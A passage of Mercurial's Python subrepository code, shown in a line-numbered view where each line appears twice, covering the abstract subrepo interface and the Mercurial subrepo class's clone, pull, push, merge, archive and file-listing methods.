518 """run whatever commands are needed to put the subrepo into
518 """run whatever commands are needed to put the subrepo into
519 this state
519 this state
520 """
520 """
521 raise NotImplementedError
521 raise NotImplementedError
522
522
523 def merge(self, state):
523 def merge(self, state):
524 """merge currently-saved state with the new state."""
524 """merge currently-saved state with the new state."""
525 raise NotImplementedError
525 raise NotImplementedError
526
526
527 def push(self, opts):
527 def push(self, opts):
528 """perform whatever action is analogous to 'hg push'
528 """perform whatever action is analogous to 'hg push'
529
529
530 This may be a no-op on some systems.
530 This may be a no-op on some systems.
531 """
531 """
532 raise NotImplementedError
532 raise NotImplementedError
533
533
534 def add(self, ui, match, prefix, explicitonly, **opts):
534 def add(self, ui, match, prefix, explicitonly, **opts):
535 return []
535 return []
536
536
537 def addremove(self, matcher, prefix, opts, dry_run, similarity):
537 def addremove(self, matcher, prefix, opts, dry_run, similarity):
538 self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
538 self.ui.warn("%s: %s" % (prefix, _("addremove is not supported")))
539 return 1
539 return 1
540
540
541 def cat(self, match, prefix, **opts):
541 def cat(self, match, prefix, **opts):
542 return 1
542 return 1
543
543
544 def status(self, rev2, **opts):
544 def status(self, rev2, **opts):
545 return scmutil.status([], [], [], [], [], [], [])
545 return scmutil.status([], [], [], [], [], [], [])
546
546
547 def diff(self, ui, diffopts, node2, match, prefix, **opts):
547 def diff(self, ui, diffopts, node2, match, prefix, **opts):
548 pass
548 pass
549
549
550 def outgoing(self, ui, dest, opts):
550 def outgoing(self, ui, dest, opts):
551 return 1
551 return 1
552
552
553 def incoming(self, ui, source, opts):
553 def incoming(self, ui, source, opts):
554 return 1
554 return 1
555
555
556 def files(self):
556 def files(self):
557 """return filename iterator"""
557 """return filename iterator"""
558 raise NotImplementedError
558 raise NotImplementedError
559
559
560 def filedata(self, name, decode):
560 def filedata(self, name, decode):
561 """return file data, optionally passed through repo decoders"""
561 """return file data, optionally passed through repo decoders"""
562 raise NotImplementedError
562 raise NotImplementedError
563
563
564 def fileflags(self, name):
564 def fileflags(self, name):
565 """return file flags"""
565 """return file flags"""
566 return ''
566 return ''
567
567
568 def getfileset(self, expr):
568 def getfileset(self, expr):
569 """Resolve the fileset expression for this repo"""
569 """Resolve the fileset expression for this repo"""
570 return set()
570 return set()
571
571
572 def printfiles(self, ui, m, fm, fmt, subrepos):
572 def printfiles(self, ui, m, fm, fmt, subrepos):
573 """handle the files command for this subrepo"""
573 """handle the files command for this subrepo"""
574 return 1
574 return 1
575
575
576 def archive(self, archiver, prefix, match=None, decode=True):
576 def archive(self, archiver, prefix, match=None, decode=True):
577 if match is not None:
577 if match is not None:
578 files = [f for f in self.files() if match(f)]
578 files = [f for f in self.files() if match(f)]
579 else:
579 else:
580 files = self.files()
580 files = self.files()
581 total = len(files)
581 total = len(files)
582 relpath = subrelpath(self)
582 relpath = subrelpath(self)
583 self.ui.progress(_('archiving (%s)') % relpath, 0,
583 self.ui.progress(_('archiving (%s)') % relpath, 0,
584 unit=_('files'), total=total)
584 unit=_('files'), total=total)
585 for i, name in enumerate(files):
585 for i, name in enumerate(files):
586 flags = self.fileflags(name)
586 flags = self.fileflags(name)
587 mode = 'x' in flags and 0o755 or 0o644
587 mode = 'x' in flags and 0o755 or 0o644
588 symlink = 'l' in flags
588 symlink = 'l' in flags
589 archiver.addfile(prefix + self._path + '/' + name,
589 archiver.addfile(prefix + self._path + '/' + name,
590 mode, symlink, self.filedata(name, decode))
590 mode, symlink, self.filedata(name, decode))
591 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
591 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
592 unit=_('files'), total=total)
592 unit=_('files'), total=total)
593 self.ui.progress(_('archiving (%s)') % relpath, None)
593 self.ui.progress(_('archiving (%s)') % relpath, None)
594 return total
594 return total
595
595
596 def walk(self, match):
596 def walk(self, match):
597 '''
597 '''
598 walk recursively through the directory tree, finding all files
598 walk recursively through the directory tree, finding all files
599 matched by the match function
599 matched by the match function
600 '''
600 '''
601 pass
601 pass
602
602
603 def forget(self, match, prefix):
603 def forget(self, match, prefix):
604 return ([], [])
604 return ([], [])
605
605
606 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
606 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
607 """remove the matched files from the subrepository and the filesystem,
607 """remove the matched files from the subrepository and the filesystem,
608 possibly by force and/or after the file has been removed from the
608 possibly by force and/or after the file has been removed from the
609 filesystem. Return 0 on success, 1 on any warning.
609 filesystem. Return 0 on success, 1 on any warning.
610 """
610 """
611 warnings.append(_("warning: removefiles not implemented (%s)")
611 warnings.append(_("warning: removefiles not implemented (%s)")
612 % self._path)
612 % self._path)
613 return 1
613 return 1
614
614
615 def revert(self, substate, *pats, **opts):
615 def revert(self, substate, *pats, **opts):
616 self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
616 self.ui.warn(_('%s: reverting %s subrepos is unsupported\n') \
617 % (substate[0], substate[2]))
617 % (substate[0], substate[2]))
618 return []
618 return []
619
619
620 def shortid(self, revid):
620 def shortid(self, revid):
621 return revid
621 return revid
622
622
623 def verify(self):
623 def verify(self):
624 '''verify the integrity of the repository. Return 0 on success or
624 '''verify the integrity of the repository. Return 0 on success or
625 warning, 1 on any error.
625 warning, 1 on any error.
626 '''
626 '''
627 return 0
627 return 0
628
628
629 @propertycache
629 @propertycache
630 def wvfs(self):
630 def wvfs(self):
631 """return vfs to access the working directory of this subrepository
631 """return vfs to access the working directory of this subrepository
632 """
632 """
633 return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))
633 return vfsmod.vfs(self._ctx.repo().wvfs.join(self._path))
634
634
635 @propertycache
635 @propertycache
636 def _relpath(self):
636 def _relpath(self):
637 """return path to this subrepository as seen from outermost repository
637 """return path to this subrepository as seen from outermost repository
638 """
638 """
639 return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)
639 return self.wvfs.reljoin(reporelpath(self._ctx.repo()), self._path)
640
640
641 class hgsubrepo(abstractsubrepo):
641 class hgsubrepo(abstractsubrepo):
642 def __init__(self, ctx, path, state, allowcreate):
642 def __init__(self, ctx, path, state, allowcreate):
643 super(hgsubrepo, self).__init__(ctx, path)
643 super(hgsubrepo, self).__init__(ctx, path)
644 self._state = state
644 self._state = state
645 r = ctx.repo()
645 r = ctx.repo()
646 root = r.wjoin(path)
646 root = r.wjoin(path)
647 create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
647 create = allowcreate and not r.wvfs.exists('%s/.hg' % path)
648 self._repo = hg.repository(r.baseui, root, create=create)
648 self._repo = hg.repository(r.baseui, root, create=create)
649
649
650 # Propagate the parent's --hidden option
650 # Propagate the parent's --hidden option
651 if r is r.unfiltered():
651 if r is r.unfiltered():
652 self._repo = self._repo.unfiltered()
652 self._repo = self._repo.unfiltered()
653
653
654 self.ui = self._repo.ui
654 self.ui = self._repo.ui
655 for s, k in [('ui', 'commitsubrepos')]:
655 for s, k in [('ui', 'commitsubrepos')]:
656 v = r.ui.config(s, k)
656 v = r.ui.config(s, k)
657 if v:
657 if v:
658 self.ui.setconfig(s, k, v, 'subrepo')
658 self.ui.setconfig(s, k, v, 'subrepo')
659 # internal config: ui._usedassubrepo
659 # internal config: ui._usedassubrepo
660 self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
660 self.ui.setconfig('ui', '_usedassubrepo', 'True', 'subrepo')
661 self._initrepo(r, state[0], create)
661 self._initrepo(r, state[0], create)
662
662
663 @annotatesubrepoerror
663 @annotatesubrepoerror
664 def addwebdirpath(self, serverpath, webconf):
664 def addwebdirpath(self, serverpath, webconf):
665 cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)
665 cmdutil.addwebdirpath(self._repo, subrelpath(self), webconf)
666
666
667 def storeclean(self, path):
667 def storeclean(self, path):
668 with self._repo.lock():
668 with self._repo.lock():
669 return self._storeclean(path)
669 return self._storeclean(path)
670
670
671 def _storeclean(self, path):
671 def _storeclean(self, path):
672 clean = True
672 clean = True
673 itercache = self._calcstorehash(path)
673 itercache = self._calcstorehash(path)
674 for filehash in self._readstorehashcache(path):
674 for filehash in self._readstorehashcache(path):
675 if filehash != next(itercache, None):
675 if filehash != next(itercache, None):
676 clean = False
676 clean = False
677 break
677 break
678 if clean:
678 if clean:
679 # if not empty:
679 # if not empty:
680 # the cached and current pull states have a different size
680 # the cached and current pull states have a different size
681 clean = next(itercache, None) is None
681 clean = next(itercache, None) is None
682 return clean
682 return clean
683
683
684 def _calcstorehash(self, remotepath):
684 def _calcstorehash(self, remotepath):
685 '''calculate a unique "store hash"
685 '''calculate a unique "store hash"
686
686
687 This method is used to to detect when there are changes that may
687 This method is used to to detect when there are changes that may
688 require a push to a given remote path.'''
688 require a push to a given remote path.'''
689 # sort the files that will be hashed in increasing (likely) file size
689 # sort the files that will be hashed in increasing (likely) file size
690 filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
690 filelist = ('bookmarks', 'store/phaseroots', 'store/00changelog.i')
691 yield '# %s\n' % _expandedabspath(remotepath)
691 yield '# %s\n' % _expandedabspath(remotepath)
692 vfs = self._repo.vfs
692 vfs = self._repo.vfs
693 for relname in filelist:
693 for relname in filelist:
694 filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
694 filehash = hashlib.sha1(vfs.tryread(relname)).hexdigest()
695 yield '%s = %s\n' % (relname, filehash)
695 yield '%s = %s\n' % (relname, filehash)
696
696
697 @propertycache
697 @propertycache
698 def _cachestorehashvfs(self):
698 def _cachestorehashvfs(self):
699 return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))
699 return vfsmod.vfs(self._repo.vfs.join('cache/storehash'))
700
700
701 def _readstorehashcache(self, remotepath):
701 def _readstorehashcache(self, remotepath):
702 '''read the store hash cache for a given remote repository'''
702 '''read the store hash cache for a given remote repository'''
703 cachefile = _getstorehashcachename(remotepath)
703 cachefile = _getstorehashcachename(remotepath)
704 return self._cachestorehashvfs.tryreadlines(cachefile, 'r')
704 return self._cachestorehashvfs.tryreadlines(cachefile, 'r')
705
705
706 def _cachestorehash(self, remotepath):
706 def _cachestorehash(self, remotepath):
707 '''cache the current store hash
707 '''cache the current store hash
708
708
709 Each remote repo requires its own store hash cache, because a subrepo
709 Each remote repo requires its own store hash cache, because a subrepo
710 store may be "clean" versus a given remote repo, but not versus another
710 store may be "clean" versus a given remote repo, but not versus another
711 '''
711 '''
712 cachefile = _getstorehashcachename(remotepath)
712 cachefile = _getstorehashcachename(remotepath)
713 with self._repo.lock():
713 with self._repo.lock():
714 storehash = list(self._calcstorehash(remotepath))
714 storehash = list(self._calcstorehash(remotepath))
715 vfs = self._cachestorehashvfs
715 vfs = self._cachestorehashvfs
716 vfs.writelines(cachefile, storehash, mode='w', notindexed=True)
716 vfs.writelines(cachefile, storehash, mode='w', notindexed=True)
717
717
718 def _getctx(self):
718 def _getctx(self):
719 '''fetch the context for this subrepo revision, possibly a workingctx
719 '''fetch the context for this subrepo revision, possibly a workingctx
720 '''
720 '''
721 if self._ctx.rev() is None:
721 if self._ctx.rev() is None:
722 return self._repo[None] # workingctx if parent is workingctx
722 return self._repo[None] # workingctx if parent is workingctx
723 else:
723 else:
724 rev = self._state[1]
724 rev = self._state[1]
725 return self._repo[rev]
725 return self._repo[rev]
726
726
727 @annotatesubrepoerror
727 @annotatesubrepoerror
728 def _initrepo(self, parentrepo, source, create):
728 def _initrepo(self, parentrepo, source, create):
729 self._repo._subparent = parentrepo
729 self._repo._subparent = parentrepo
730 self._repo._subsource = source
730 self._repo._subsource = source
731
731
732 if create:
732 if create:
733 lines = ['[paths]\n']
733 lines = ['[paths]\n']
734
734
735 def addpathconfig(key, value):
735 def addpathconfig(key, value):
736 if value:
736 if value:
737 lines.append('%s = %s\n' % (key, value))
737 lines.append('%s = %s\n' % (key, value))
738 self.ui.setconfig('paths', key, value, 'subrepo')
738 self.ui.setconfig('paths', key, value, 'subrepo')
739
739
740 defpath = _abssource(self._repo, abort=False)
740 defpath = _abssource(self._repo, abort=False)
741 defpushpath = _abssource(self._repo, True, abort=False)
741 defpushpath = _abssource(self._repo, True, abort=False)
742 addpathconfig('default', defpath)
742 addpathconfig('default', defpath)
743 if defpath != defpushpath:
743 if defpath != defpushpath:
744 addpathconfig('default-push', defpushpath)
744 addpathconfig('default-push', defpushpath)
745
745
746 fp = self._repo.vfs("hgrc", "w", text=True)
746 fp = self._repo.vfs("hgrc", "w", text=True)
747 try:
747 try:
748 fp.write(''.join(lines))
748 fp.write(''.join(lines))
749 finally:
749 finally:
750 fp.close()
750 fp.close()
751
751
752 @annotatesubrepoerror
752 @annotatesubrepoerror
753 def add(self, ui, match, prefix, explicitonly, **opts):
753 def add(self, ui, match, prefix, explicitonly, **opts):
754 return cmdutil.add(ui, self._repo, match,
754 return cmdutil.add(ui, self._repo, match,
755 self.wvfs.reljoin(prefix, self._path),
755 self.wvfs.reljoin(prefix, self._path),
756 explicitonly, **opts)
756 explicitonly, **opts)
757
757
758 @annotatesubrepoerror
758 @annotatesubrepoerror
759 def addremove(self, m, prefix, opts, dry_run, similarity):
759 def addremove(self, m, prefix, opts, dry_run, similarity):
760 # In the same way as sub directories are processed, once in a subrepo,
760 # In the same way as sub directories are processed, once in a subrepo,
761 # always entry any of its subrepos. Don't corrupt the options that will
761 # always entry any of its subrepos. Don't corrupt the options that will
762 # be used to process sibling subrepos however.
762 # be used to process sibling subrepos however.
763 opts = copy.copy(opts)
763 opts = copy.copy(opts)
764 opts['subrepos'] = True
764 opts['subrepos'] = True
765 return scmutil.addremove(self._repo, m,
765 return scmutil.addremove(self._repo, m,
766 self.wvfs.reljoin(prefix, self._path), opts,
766 self.wvfs.reljoin(prefix, self._path), opts,
767 dry_run, similarity)
767 dry_run, similarity)
768
768
769 @annotatesubrepoerror
769 @annotatesubrepoerror
770 def cat(self, match, prefix, **opts):
770 def cat(self, match, prefix, **opts):
771 rev = self._state[1]
771 rev = self._state[1]
772 ctx = self._repo[rev]
772 ctx = self._repo[rev]
773 return cmdutil.cat(self.ui, self._repo, ctx, match, prefix, **opts)
773 return cmdutil.cat(self.ui, self._repo, ctx, match, prefix, **opts)
774
774
775 @annotatesubrepoerror
775 @annotatesubrepoerror
776 def status(self, rev2, **opts):
776 def status(self, rev2, **opts):
777 try:
777 try:
778 rev1 = self._state[1]
778 rev1 = self._state[1]
779 ctx1 = self._repo[rev1]
779 ctx1 = self._repo[rev1]
780 ctx2 = self._repo[rev2]
780 ctx2 = self._repo[rev2]
781 return self._repo.status(ctx1, ctx2, **opts)
781 return self._repo.status(ctx1, ctx2, **opts)
782 except error.RepoLookupError as inst:
782 except error.RepoLookupError as inst:
783 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
783 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
784 % (inst, subrelpath(self)))
784 % (inst, subrelpath(self)))
785 return scmutil.status([], [], [], [], [], [], [])
785 return scmutil.status([], [], [], [], [], [], [])
786
786
787 @annotatesubrepoerror
787 @annotatesubrepoerror
788 def diff(self, ui, diffopts, node2, match, prefix, **opts):
788 def diff(self, ui, diffopts, node2, match, prefix, **opts):
789 try:
789 try:
790 node1 = node.bin(self._state[1])
790 node1 = node.bin(self._state[1])
791 # We currently expect node2 to come from substate and be
791 # We currently expect node2 to come from substate and be
792 # in hex format
792 # in hex format
793 if node2 is not None:
793 if node2 is not None:
794 node2 = node.bin(node2)
794 node2 = node.bin(node2)
795 cmdutil.diffordiffstat(ui, self._repo, diffopts,
795 cmdutil.diffordiffstat(ui, self._repo, diffopts,
796 node1, node2, match,
796 node1, node2, match,
797 prefix=posixpath.join(prefix, self._path),
797 prefix=posixpath.join(prefix, self._path),
798 listsubrepos=True, **opts)
798 listsubrepos=True, **opts)
799 except error.RepoLookupError as inst:
799 except error.RepoLookupError as inst:
800 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
800 self.ui.warn(_('warning: error "%s" in subrepository "%s"\n')
801 % (inst, subrelpath(self)))
801 % (inst, subrelpath(self)))
802
802
803 @annotatesubrepoerror
803 @annotatesubrepoerror
804 def archive(self, archiver, prefix, match=None, decode=True):
804 def archive(self, archiver, prefix, match=None, decode=True):
805 self._get(self._state + ('hg',))
805 self._get(self._state + ('hg',))
806 total = abstractsubrepo.archive(self, archiver, prefix, match)
806 total = abstractsubrepo.archive(self, archiver, prefix, match)
807 rev = self._state[1]
807 rev = self._state[1]
808 ctx = self._repo[rev]
808 ctx = self._repo[rev]
809 for subpath in ctx.substate:
809 for subpath in ctx.substate:
810 s = subrepo(ctx, subpath, True)
810 s = subrepo(ctx, subpath, True)
811 submatch = matchmod.subdirmatcher(subpath, match)
811 submatch = matchmod.subdirmatcher(subpath, match)
812 total += s.archive(archiver, prefix + self._path + '/', submatch,
812 total += s.archive(archiver, prefix + self._path + '/', submatch,
813 decode)
813 decode)
814 return total
814 return total
815
815
816 @annotatesubrepoerror
816 @annotatesubrepoerror
817 def dirty(self, ignoreupdate=False):
817 def dirty(self, ignoreupdate=False):
818 r = self._state[1]
818 r = self._state[1]
819 if r == '' and not ignoreupdate: # no state recorded
819 if r == '' and not ignoreupdate: # no state recorded
820 return True
820 return True
821 w = self._repo[None]
821 w = self._repo[None]
822 if r != w.p1().hex() and not ignoreupdate:
822 if r != w.p1().hex() and not ignoreupdate:
823 # different version checked out
823 # different version checked out
824 return True
824 return True
825 return w.dirty() # working directory changed
825 return w.dirty() # working directory changed
826
826
827 def basestate(self):
827 def basestate(self):
828 return self._repo['.'].hex()
828 return self._repo['.'].hex()
829
829
830 def checknested(self, path):
830 def checknested(self, path):
831 return self._repo._checknested(self._repo.wjoin(path))
831 return self._repo._checknested(self._repo.wjoin(path))
832
832
833 @annotatesubrepoerror
833 @annotatesubrepoerror
834 def commit(self, text, user, date):
834 def commit(self, text, user, date):
835 # don't bother committing in the subrepo if it's only been
835 # don't bother committing in the subrepo if it's only been
836 # updated
836 # updated
837 if not self.dirty(True):
837 if not self.dirty(True):
838 return self._repo['.'].hex()
838 return self._repo['.'].hex()
839 self.ui.debug("committing subrepo %s\n" % subrelpath(self))
839 self.ui.debug("committing subrepo %s\n" % subrelpath(self))
840 n = self._repo.commit(text, user, date)
840 n = self._repo.commit(text, user, date)
841 if not n:
841 if not n:
842 return self._repo['.'].hex() # different version checked out
842 return self._repo['.'].hex() # different version checked out
843 return node.hex(n)
843 return node.hex(n)
844
844
845 @annotatesubrepoerror
845 @annotatesubrepoerror
846 def phase(self, state):
846 def phase(self, state):
847 return self._repo[state].phase()
847 return self._repo[state].phase()
848
848
849 @annotatesubrepoerror
849 @annotatesubrepoerror
850 def remove(self):
850 def remove(self):
851 # we can't fully delete the repository as it may contain
851 # we can't fully delete the repository as it may contain
852 # local-only history
852 # local-only history
853 self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
853 self.ui.note(_('removing subrepo %s\n') % subrelpath(self))
854 hg.clean(self._repo, node.nullid, False)
854 hg.clean(self._repo, node.nullid, False)
855
855
856 def _get(self, state):
856 def _get(self, state):
857 source, revision, kind = state
857 source, revision, kind = state
858 if revision in self._repo.unfiltered():
858 if revision in self._repo.unfiltered():
859 return True
859 return True
860 self._repo._subsource = source
860 self._repo._subsource = source
861 srcurl = _abssource(self._repo)
861 srcurl = _abssource(self._repo)
862 other = hg.peer(self._repo, {}, srcurl)
862 other = hg.peer(self._repo, {}, srcurl)
863 if len(self._repo) == 0:
863 if len(self._repo) == 0:
864 self.ui.status(_('cloning subrepo %s from %s\n')
864 self.ui.status(_('cloning subrepo %s from %s\n')
865 % (subrelpath(self), srcurl))
865 % (subrelpath(self), srcurl))
866 parentrepo = self._repo._subparent
866 parentrepo = self._repo._subparent
867 # use self._repo.vfs instead of self.wvfs to remove .hg only
867 # use self._repo.vfs instead of self.wvfs to remove .hg only
868 self._repo.vfs.rmtree()
868 self._repo.vfs.rmtree()
869 other, cloned = hg.clone(self._repo._subparent.baseui, {},
869 other, cloned = hg.clone(self._repo._subparent.baseui, {},
870 other, self._repo.root,
870 other, self._repo.root,
871 update=False)
871 update=False)
872 self._repo = cloned.local()
872 self._repo = cloned.local()
873 self._initrepo(parentrepo, source, create=True)
873 self._initrepo(parentrepo, source, create=True)
874 self._cachestorehash(srcurl)
874 self._cachestorehash(srcurl)
875 else:
875 else:
876 self.ui.status(_('pulling subrepo %s from %s\n')
876 self.ui.status(_('pulling subrepo %s from %s\n')
877 % (subrelpath(self), srcurl))
877 % (subrelpath(self), srcurl))
878 cleansub = self.storeclean(srcurl)
878 cleansub = self.storeclean(srcurl)
879 exchange.pull(self._repo, other)
879 exchange.pull(self._repo, other)
880 if cleansub:
880 if cleansub:
881 # keep the repo clean after pull
881 # keep the repo clean after pull
882 self._cachestorehash(srcurl)
882 self._cachestorehash(srcurl)
883 return False
883 return False
884
884
885 @annotatesubrepoerror
885 @annotatesubrepoerror
886 def get(self, state, overwrite=False):
886 def get(self, state, overwrite=False):
887 inrepo = self._get(state)
887 inrepo = self._get(state)
888 source, revision, kind = state
888 source, revision, kind = state
889 repo = self._repo
889 repo = self._repo
890 repo.ui.debug("getting subrepo %s\n" % self._path)
890 repo.ui.debug("getting subrepo %s\n" % self._path)
891 if inrepo:
891 if inrepo:
892 urepo = repo.unfiltered()
892 urepo = repo.unfiltered()
893 ctx = urepo[revision]
893 ctx = urepo[revision]
894 if ctx.hidden():
894 if ctx.hidden():
895 urepo.ui.warn(
895 urepo.ui.warn(
896 _('revision %s in subrepo %s is hidden\n') \
896 _('revision %s in subrepo %s is hidden\n') \
897 % (revision[0:12], self._path))
897 % (revision[0:12], self._path))
898 repo = urepo
898 repo = urepo
899 hg.updaterepo(repo, revision, overwrite)
899 hg.updaterepo(repo, revision, overwrite)
900
900
901 @annotatesubrepoerror
901 @annotatesubrepoerror
902 def merge(self, state):
902 def merge(self, state):
903 self._get(state)
903 self._get(state)
904 cur = self._repo['.']
904 cur = self._repo['.']
905 dst = self._repo[state[1]]
905 dst = self._repo[state[1]]
906 anc = dst.ancestor(cur)
906 anc = dst.ancestor(cur)
907
907
908 def mergefunc():
908 def mergefunc():
909 if anc == cur and dst.branch() == cur.branch():
909 if anc == cur and dst.branch() == cur.branch():
910 self.ui.debug("updating subrepo %s\n" % subrelpath(self))
910 self.ui.debug("updating subrepo %s\n" % subrelpath(self))
911 hg.update(self._repo, state[1])
911 hg.update(self._repo, state[1])
912 elif anc == dst:
912 elif anc == dst:
913 self.ui.debug("skipping subrepo %s\n" % subrelpath(self))
913 self.ui.debug("skipping subrepo %s\n" % subrelpath(self))
914 else:
914 else:
915 self.ui.debug("merging subrepo %s\n" % subrelpath(self))
915 self.ui.debug("merging subrepo %s\n" % subrelpath(self))
916 hg.merge(self._repo, state[1], remind=False)
916 hg.merge(self._repo, state[1], remind=False)
917
917
918 wctx = self._repo[None]
918 wctx = self._repo[None]
919 if self.dirty():
919 if self.dirty():
920 if anc != dst:
920 if anc != dst:
921 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
921 if _updateprompt(self.ui, self, wctx.dirty(), cur, dst):
922 mergefunc()
922 mergefunc()
923 else:
923 else:
924 mergefunc()
924 mergefunc()
925 else:
925 else:
926 mergefunc()
926 mergefunc()
927
927
928 @annotatesubrepoerror
928 @annotatesubrepoerror
929 def push(self, opts):
929 def push(self, opts):
930 force = opts.get('force')
930 force = opts.get('force')
931 newbranch = opts.get('new_branch')
931 newbranch = opts.get('new_branch')
932 ssh = opts.get('ssh')
932 ssh = opts.get('ssh')
933
933
934 # push subrepos depth-first for coherent ordering
934 # push subrepos depth-first for coherent ordering
935 c = self._repo['']
935 c = self._repo['']
936 subs = c.substate # only repos that are committed
936 subs = c.substate # only repos that are committed
937 for s in sorted(subs):
937 for s in sorted(subs):
938 if c.sub(s).push(opts) == 0:
938 if c.sub(s).push(opts) == 0:
939 return False
939 return False
940
940
941 dsturl = _abssource(self._repo, True)
941 dsturl = _abssource(self._repo, True)
942 if not force:
942 if not force:
943 if self.storeclean(dsturl):
943 if self.storeclean(dsturl):
944 self.ui.status(
944 self.ui.status(
945 _('no changes made to subrepo %s since last push to %s\n')
945 _('no changes made to subrepo %s since last push to %s\n')
946 % (subrelpath(self), dsturl))
946 % (subrelpath(self), dsturl))
947 return None
947 return None
948 self.ui.status(_('pushing subrepo %s to %s\n') %
948 self.ui.status(_('pushing subrepo %s to %s\n') %
949 (subrelpath(self), dsturl))
949 (subrelpath(self), dsturl))
950 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
950 other = hg.peer(self._repo, {'ssh': ssh}, dsturl)
951 res = exchange.push(self._repo, other, force, newbranch=newbranch)
951 res = exchange.push(self._repo, other, force, newbranch=newbranch)
952
952
953 # the repo is now clean
953 # the repo is now clean
954 self._cachestorehash(dsturl)
954 self._cachestorehash(dsturl)
955 return res.cgresult
955 return res.cgresult
956
956
957 @annotatesubrepoerror
957 @annotatesubrepoerror
958 def outgoing(self, ui, dest, opts):
958 def outgoing(self, ui, dest, opts):
959 if 'rev' in opts or 'branch' in opts:
959 if 'rev' in opts or 'branch' in opts:
960 opts = copy.copy(opts)
960 opts = copy.copy(opts)
961 opts.pop('rev', None)
961 opts.pop('rev', None)
962 opts.pop('branch', None)
962 opts.pop('branch', None)
963 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
963 return hg.outgoing(ui, self._repo, _abssource(self._repo, True), opts)
964
964
965 @annotatesubrepoerror
965 @annotatesubrepoerror
966 def incoming(self, ui, source, opts):
966 def incoming(self, ui, source, opts):
967 if 'rev' in opts or 'branch' in opts:
967 if 'rev' in opts or 'branch' in opts:
968 opts = copy.copy(opts)
968 opts = copy.copy(opts)
969 opts.pop('rev', None)
969 opts.pop('rev', None)
970 opts.pop('branch', None)
970 opts.pop('branch', None)
971 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
971 return hg.incoming(ui, self._repo, _abssource(self._repo, False), opts)
972
972
973 @annotatesubrepoerror
973 @annotatesubrepoerror
974 def files(self):
974 def files(self):
975 rev = self._state[1]
975 rev = self._state[1]
976 ctx = self._repo[rev]
976 ctx = self._repo[rev]
977 return ctx.manifest().keys()
977 return ctx.manifest().keys()
978
978
979 def filedata(self, name, decode):
979 def filedata(self, name, decode):
980 rev = self._state[1]
980 rev = self._state[1]
981 data = self._repo[rev][name].data()
981 data = self._repo[rev][name].data()
982 if decode:
982 if decode:
983 data = self._repo.wwritedata(name, data)
983 data = self._repo.wwritedata(name, data)
984 return data
984 return data
985
985
986 def fileflags(self, name):
986 def fileflags(self, name):
987 rev = self._state[1]
987 rev = self._state[1]
988 ctx = self._repo[rev]
988 ctx = self._repo[rev]
989 return ctx.flags(name)
989 return ctx.flags(name)
990
990
991 @annotatesubrepoerror
991 @annotatesubrepoerror
992 def printfiles(self, ui, m, fm, fmt, subrepos):
992 def printfiles(self, ui, m, fm, fmt, subrepos):
993 # If the parent context is a workingctx, use the workingctx here for
993 # If the parent context is a workingctx, use the workingctx here for
994 # consistency.
994 # consistency.
995 if self._ctx.rev() is None:
995 if self._ctx.rev() is None:
996 ctx = self._repo[None]
996 ctx = self._repo[None]
997 else:
997 else:
998 rev = self._state[1]
998 rev = self._state[1]
999 ctx = self._repo[rev]
999 ctx = self._repo[rev]
1000 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1000 return cmdutil.files(ui, ctx, m, fm, fmt, subrepos)
1001
1001
1002 @annotatesubrepoerror
1002 @annotatesubrepoerror
1003 def getfileset(self, expr):
1003 def getfileset(self, expr):
1004 if self._ctx.rev() is None:
1004 if self._ctx.rev() is None:
1005 ctx = self._repo[None]
1005 ctx = self._repo[None]
1006 else:
1006 else:
1007 rev = self._state[1]
1007 rev = self._state[1]
1008 ctx = self._repo[rev]
1008 ctx = self._repo[rev]
1009
1009
1010 files = ctx.getfileset(expr)
1010 files = ctx.getfileset(expr)
1011
1011
1012 for subpath in ctx.substate:
1012 for subpath in ctx.substate:
1013 sub = ctx.sub(subpath)
1013 sub = ctx.sub(subpath)
1014
1014
1015 try:
1015 try:
1016 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1016 files.extend(subpath + '/' + f for f in sub.getfileset(expr))
1017 except error.LookupError:
1017 except error.LookupError:
1018 self.ui.status(_("skipping missing subrepository: %s\n")
1018 self.ui.status(_("skipping missing subrepository: %s\n")
1019 % self.wvfs.reljoin(reporelpath(self), subpath))
1019 % self.wvfs.reljoin(reporelpath(self), subpath))
1020 return files
1020 return files
1021
1021
1022 def walk(self, match):
1022 def walk(self, match):
1023 ctx = self._repo[None]
1023 ctx = self._repo[None]
1024 return ctx.walk(match)
1024 return ctx.walk(match)
1025
1025
1026 @annotatesubrepoerror
1026 @annotatesubrepoerror
1027 def forget(self, match, prefix):
1027 def forget(self, match, prefix):
1028 return cmdutil.forget(self.ui, self._repo, match,
1028 return cmdutil.forget(self.ui, self._repo, match,
1029 self.wvfs.reljoin(prefix, self._path), True)
1029 self.wvfs.reljoin(prefix, self._path), True)
1030
1030
1031 @annotatesubrepoerror
1031 @annotatesubrepoerror
1032 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1032 def removefiles(self, matcher, prefix, after, force, subrepos, warnings):
1033 return cmdutil.remove(self.ui, self._repo, matcher,
1033 return cmdutil.remove(self.ui, self._repo, matcher,
1034 self.wvfs.reljoin(prefix, self._path),
1034 self.wvfs.reljoin(prefix, self._path),
1035 after, force, subrepos)
1035 after, force, subrepos)
1036
1036
1037 @annotatesubrepoerror
1037 @annotatesubrepoerror
1038 def revert(self, substate, *pats, **opts):
1038 def revert(self, substate, *pats, **opts):
1039 # reverting a subrepo is a 2 step process:
1039 # reverting a subrepo is a 2 step process:
